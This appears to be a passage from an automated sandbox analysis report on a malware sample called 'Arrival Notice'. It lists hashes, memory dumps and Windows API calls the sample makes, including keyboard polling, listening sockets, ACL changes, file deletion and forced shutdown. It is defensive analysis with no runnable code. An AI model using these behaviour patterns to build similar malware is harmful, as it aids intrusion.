                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 1824444939-438819550
                                              • Opcode ID: 562cf2674d2d4b4ee61eed27b1e62412193d33f2f0ca89129c70a423a16dcee7
                                              • Instruction ID: 385f3f936b3fe071c017cf7447c746325f29cc884df6aba658f8ecbd0b1f8606
                                              • Opcode Fuzzy Hash: 562cf2674d2d4b4ee61eed27b1e62412193d33f2f0ca89129c70a423a16dcee7
                                              • Instruction Fuzzy Hash: 5931C2729012196ADB10AB65ECACAEF77AC9F49365F200175F914E31B0DB34DE84DF60
                                              APIs
                                                • Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00928766
                                                • Part of subcall function 0092874A: GetLastError.KERNEL32(?,0092822A,?,?,?), ref: 00928770
                                                • Part of subcall function 0092874A: GetProcessHeap.KERNEL32(00000008,?,?,0092822A,?,?,?), ref: 0092877F
                                                • Part of subcall function 0092874A: HeapAlloc.KERNEL32(00000000,?,0092822A,?,?,?), ref: 00928786
                                                • Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092879D
                                                • Part of subcall function 009287E7: GetProcessHeap.KERNEL32(00000008,00928240,00000000,00000000,?,00928240,?), ref: 009287F3
                                                • Part of subcall function 009287E7: HeapAlloc.KERNEL32(00000000,?,00928240,?), ref: 009287FA
                                                • Part of subcall function 009287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00928240,?), ref: 0092880B
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0092825B
                                              • _memset.LIBCMT ref: 00928270
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092828F
                                              • GetLengthSid.ADVAPI32(?), ref: 009282A0
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 009282DD
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009282F9
                                              • GetLengthSid.ADVAPI32(?), ref: 00928316
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00928325
                                              • HeapAlloc.KERNEL32(00000000), ref: 0092832C
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092834D
                                              • CopySid.ADVAPI32(00000000), ref: 00928354
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00928385
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009283AB
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009283BF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: 9ee18397c5c45e0c2331a7764782a7428876ec3604c56e95501c8b0b43564e7c
                                              • Instruction ID: e6e730f4d6fb5248252aec7a5d76be97ad09da0d00115daa63acff7a510c5ed6
                                              • Opcode Fuzzy Hash: 9ee18397c5c45e0c2331a7764782a7428876ec3604c56e95501c8b0b43564e7c
                                              • Instruction Fuzzy Hash: AF616A71905219EFDF00DFA5EC98AEEBBB9FF04710F188129F815A7291DB319A05DB60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                              • API String ID: 0-4052911093
                                              • Opcode ID: d2429f5dc1fa859d8c01f4adcd3fc8dca81174f4835cbaa3b6ec18e61aaafa42
                                              • Instruction ID: 2cb210ca25d5eb902f4529add3bcf9679f135e71f96bde00bb37ce117b0d8ef6
                                              • Opcode Fuzzy Hash: d2429f5dc1fa859d8c01f4adcd3fc8dca81174f4835cbaa3b6ec18e61aaafa42
                                              • Instruction Fuzzy Hash: B172A271E00269DBDB24DF59D8807AEB7F5FF69310F14816AE849EB284E7309D91CB90
                                              APIs
                                                • Part of subcall function 009510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950737
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009507D6
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0095086E
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00950AAD
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00950ABA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              • Opcode ID: 0d684e58bec188d835ba387d4f783ec88c62dd7b0f090dff091e1ff2452bb2fb
                                              • Instruction ID: 2fc98319bc2b73ec4307b94dd4a6980fa76617befbc8545854c092d2fb8f22d1
                                              • Opcode Fuzzy Hash: 0d684e58bec188d835ba387d4f783ec88c62dd7b0f090dff091e1ff2452bb2fb
                                              • Instruction Fuzzy Hash: 7AE13171604310AFCB14DF29C895E6ABBE8FF89714F04896DF899D7262DA30ED05CB52
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00930241
                                              • GetAsyncKeyState.USER32(000000A0), ref: 009302C2
                                              • GetKeyState.USER32(000000A0), ref: 009302DD
                                              • GetAsyncKeyState.USER32(000000A1), ref: 009302F7
                                              • GetKeyState.USER32(000000A1), ref: 0093030C
                                              • GetAsyncKeyState.USER32(00000011), ref: 00930324
                                              • GetKeyState.USER32(00000011), ref: 00930336
                                              • GetAsyncKeyState.USER32(00000012), ref: 0093034E
                                              • GetKeyState.USER32(00000012), ref: 00930360
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00930378
                                              • GetKeyState.USER32(0000005B), ref: 0093038A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 4f917f632f07b0f260cf14d422ddc5956073888951a2dd71f082f7d9e35083b3
                                              • Instruction ID: 6326b42d775799a1dda46e320bd05ba73825e244d91766c5dab46e004a4d03e6
                                              • Opcode Fuzzy Hash: 4f917f632f07b0f260cf14d422ddc5956073888951a2dd71f082f7d9e35083b3
                                              • Instruction Fuzzy Hash: 3A41B9645087C96EFF319A6488283B6BEA9BF92340F08409DD5D6471C2EBD55DC4CFA2
                                              APIs
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                              • CoInitialize.OLE32 ref: 00948718
                                              • CoUninitialize.OLE32 ref: 00948723
                                              • CoCreateInstance.OLE32(?,00000000,00000017,00962BEC,?), ref: 00948783
                                              • IIDFromString.OLE32(?,?), ref: 009487F6
                                              • VariantInit.OLEAUT32(?), ref: 00948890
                                              • VariantClear.OLEAUT32(?), ref: 009488F1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: c97c22c2cc5cf653f62eb4292459441113af5f9d7639e4613ab2b140afd171c8
                                              • Instruction ID: 3924aabd4e059e730fb84b1f8b8ce5a3c4bd333f8c29c577208e9de06464d771
                                              • Opcode Fuzzy Hash: c97c22c2cc5cf653f62eb4292459441113af5f9d7639e4613ab2b140afd171c8
                                              • Instruction Fuzzy Hash: 37616770608301AFD710DF64C898E6FBBE8AF88714F10491AF9959B391DB74ED48CB92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: e89b880b2c9b20db2b0759dab93f62ac2f7ce94a0c1f229a5a1848914778e1d2
                                              • Instruction ID: e1322b11137598c9c3ca75d4520d03a0bc0f51181492293b75d86667c6315b4a
                                              • Opcode Fuzzy Hash: e89b880b2c9b20db2b0759dab93f62ac2f7ce94a0c1f229a5a1848914778e1d2
                                              • Instruction Fuzzy Hash: E321AE35215224AFDB10AF25EC19F6E7BA8FF44722F10802AF946DB2B1CB35AC00DB55
                                              APIs
                                                • Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE
                                                • Part of subcall function 00934CD3: GetFileAttributesW.KERNEL32(?,00933947), ref: 00934CD4
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00933ADF
                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00933B87
                                              • MoveFileW.KERNEL32(?,?), ref: 00933B9A
                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00933BB7
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00933BD9
                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00933BF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 4002782344-1173974218
                                              • Opcode ID: 58a4eb2c08ce903590edc017e5216d1e9917790a87fb084a2802c89b0c029297
                                              • Instruction ID: ea5e4b567d3f0b6a9ce3f2b1499de0b4b4d9c4e74f7ea706c26436f1ed370517
                                              • Opcode Fuzzy Hash: 58a4eb2c08ce903590edc017e5216d1e9917790a87fb084a2802c89b0c029297
                                              • Instruction Fuzzy Hash: C55160318452599ACF15EBA4CD929FDB7B9EF14300F64826AE442B7191EF306F09CF61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s%u$ERCP$VUUU$VUUU$VUUU$VUUU
                                              • API String ID: 0-2149088777
                                              • Opcode ID: f8f13be8e42c035ef07eb6fe6b2f081b392b0a41965f2b8a8f3da4b5d7fc2299
                                              • Instruction ID: 474b097fe9709529bd1e0a15d341f54804d27cd93056f1a838f1bf80cb978821
                                              • Opcode Fuzzy Hash: f8f13be8e42c035ef07eb6fe6b2f081b392b0a41965f2b8a8f3da4b5d7fc2299
                                              • Instruction Fuzzy Hash: 8DA27A74A0425E8BDF24CF59C9807EEB7B1FB56314F2491AAD85AE7280D7309EC5DB80
                                              APIs
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0093F6AB
                                              • Sleep.KERNEL32(0000000A), ref: 0093F6DB
                                              • _wcscmp.LIBCMT ref: 0093F6EF
                                              • _wcscmp.LIBCMT ref: 0093F70A
                                              • FindNextFileW.KERNEL32(?,?), ref: 0093F7A8
                                              • FindClose.KERNEL32(00000000), ref: 0093F7BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 713712311-438819550
                                              • Opcode ID: 385613d298e23acaafc5039d93693a3d1ab5f8cb60430e4175a045866912647e
                                              • Instruction ID: 5f9de1f7afcfa30623b9828b0faad4a949b430658d3b0c3829752c6609bd9414
                                              • Opcode Fuzzy Hash: 385613d298e23acaafc5039d93693a3d1ab5f8cb60430e4175a045866912647e
                                              • Instruction Fuzzy Hash: 6F416D71D0421A9BDF11EF64CC95EEEBBB8FF05314F144566E819A22A0EB309E44CF91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 81838ef3d76e79c1f1a51575f63aea7ee2c2eeb6556c5bb80011b00187dc9887
                                              • Instruction ID: e333aaee721e609c57b45a4aff371045eedc09e536e5d7a92461db0bb6ef30a9
                                              • Opcode Fuzzy Hash: 81838ef3d76e79c1f1a51575f63aea7ee2c2eeb6556c5bb80011b00187dc9887
                                              • Instruction Fuzzy Hash: E212BB70A00619DFDF14DFA9D981AAEB7F5FF88304F104229E406E7296EB35AD11CB51
                                              APIs
                                                • Part of subcall function 00928CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00928D0D
                                                • Part of subcall function 00928CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00928D3A
                                                • Part of subcall function 00928CC3: GetLastError.KERNEL32 ref: 00928D47
                                              • ExitWindowsEx.USER32(?,00000000), ref: 0093549B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-194228
                                              • Opcode ID: ac19edf39cc9dd1d5ba1b2c6933349d848efad085edc48f72bb567f087e4a893
                                              • Instruction ID: 36d5b986a4e6b5e8950304ba3fa1229cd3290aa03f02298350abca22654376de
                                              • Opcode Fuzzy Hash: ac19edf39cc9dd1d5ba1b2c6933349d848efad085edc48f72bb567f087e4a893
                                              • Instruction Fuzzy Hash: 9F01F7316A5B116AE72C6774EC4EBBB729CEB48353F250521FD47D20E3EA945C808A90
                                              APIs
                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009465EF
                                              • WSAGetLastError.WSOCK32(00000000), ref: 009465FE
                                              • bind.WSOCK32(00000000,?,00000010), ref: 0094661A
                                              • listen.WSOCK32(00000000,00000005), ref: 00946629
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00946643
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00946657
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: bfddb2b2b03f992b2eeebbb9d557500f6487fc4a12c017d9df210a1ff5d51781
                                              • Instruction ID: 64e7cb7f1850f2e7a4d391becbc31b813ec6a7d8bf882aca474b1933fb54d62b
                                              • Opcode Fuzzy Hash: bfddb2b2b03f992b2eeebbb9d557500f6487fc4a12c017d9df210a1ff5d51781
                                              • Instruction Fuzzy Hash: 21219E71200210AFCB10AF28D859F6EB7A9EF49721F15825AF956E73D1CB70AD01DB52
                                              APIs
                                                • Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
                                                • Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041
                                              • _memmove.LIBCMT ref: 0092062F
                                              • _memmove.LIBCMT ref: 00920744
                                              • _memmove.LIBCMT ref: 009207EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                              • String ID:
                                              • API String ID: 1300846289-0
                                              • Opcode ID: 37cfc808d3f551a3c9980c0a4be73e25358751f8a75bc3e2f4197341451c829c
                                              • Instruction ID: 149bf06bd884185c3646c306f479399120ab2c0668eeef393e4c471b067a67e2
                                              • Opcode Fuzzy Hash: 37cfc808d3f551a3c9980c0a4be73e25358751f8a75bc3e2f4197341451c829c
                                              • Instruction Fuzzy Hash: 6C029F70A00219DFDF04DF69E981AAE7BB5FF84304F148069E806DB396EB35DA54CB91
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 008D19FA
                                              • GetSysColor.USER32(0000000F), ref: 008D1A4E
                                              • SetBkColor.GDI32(?,00000000), ref: 008D1A61
                                                • Part of subcall function 008D1290: DefDlgProcW.USER32(?,00000020,?), ref: 008D12D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ColorProc$LongWindow
                                              • String ID:
                                              • API String ID: 3744519093-0
                                              • Opcode ID: 9bdecfb8912e7fd60ed44b4007fbd47173bdffaca32a0fbf1ecfe27aebba7553
                                              • Instruction ID: fabf5b1bc1af014d2824ec947adc0b863d91199c18926d99ff70efadb9857803
                                              • Opcode Fuzzy Hash: 9bdecfb8912e7fd60ed44b4007fbd47173bdffaca32a0fbf1ecfe27aebba7553
                                              • Instruction Fuzzy Hash: E0A125B1115668BEEE28AA2E9C5CE7B379CFF82746B14031BF442D63D5CA148C0192B2
                                              APIs
                                                • Part of subcall function 009480A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009480CB
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00946AB1
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00946ADA
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00946B13
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00946B20
                                              • closesocket.WSOCK32(00000000,00000000), ref: 00946B34
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 99427753-0
                                              • Opcode ID: 172cb61f565d45c73981dcdce1c6d92a171d0c4b35d1acc0297330d58dc54e1f
                                              • Instruction ID: f51def1013c581f8cf17604f845ca88ca58eeaa15878c3104d8282eed46c712b
                                              • Opcode Fuzzy Hash: 172cb61f565d45c73981dcdce1c6d92a171d0c4b35d1acc0297330d58dc54e1f
                                              • Instruction Fuzzy Hash: E541D775740210AFEB10BF28DC86F6E77A9EB45720F04815EF956EB3C2DA705D008B92
                                              APIs
